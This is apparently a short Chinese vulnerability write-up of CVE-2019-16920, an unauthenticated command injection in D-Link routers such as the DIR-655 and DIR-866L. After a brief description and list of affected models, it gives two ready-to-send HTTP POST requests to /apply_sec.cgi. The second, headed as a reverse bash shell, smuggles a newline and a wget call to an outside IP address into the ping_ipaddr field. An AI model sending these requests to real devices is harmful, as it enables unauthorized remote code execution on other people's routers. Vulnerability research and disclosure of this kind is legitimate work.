漏洞描述 #
2019年9月,Fortinet FortiGuard实验室发现并报告了D-Link 产品中的有个非认证的命令注入漏洞——CVE-2019-16920,成功利用该漏洞可以导致远程代码执行。因为该漏洞可以在不经过认证的情况下远程触发,因此研究人员将该漏洞评为中危。
漏洞影响 #
DIR-655
DIR-866L
DIR-652
DHP-1565
漏洞复现 #
该漏洞源于一个失败的认证检查。为了了解该问题,研究人员首先查看了admin页面,然后执行了login动作。
漏洞位:
登陆口
POST /apply_sec.cgi HTTP/1.1 Host: 192.168.232.128 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 142 Connection: close Referer: http://192.168.232.128/ Upgrade-Insecure-Requests: 1 html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=& graph_code=&session_id=62384
执行命令 反弹bash
POST /apply_sec.cgi HTTP/1.1 Host: 192.168.232.128 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 131 Connection: close Referer: http://192.168.232.128/login_pic.asp Cookie: uid=1234123 Upgrade-Insecure-Requests: 1 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://45.76.148.31:4321/?$(echo 1234)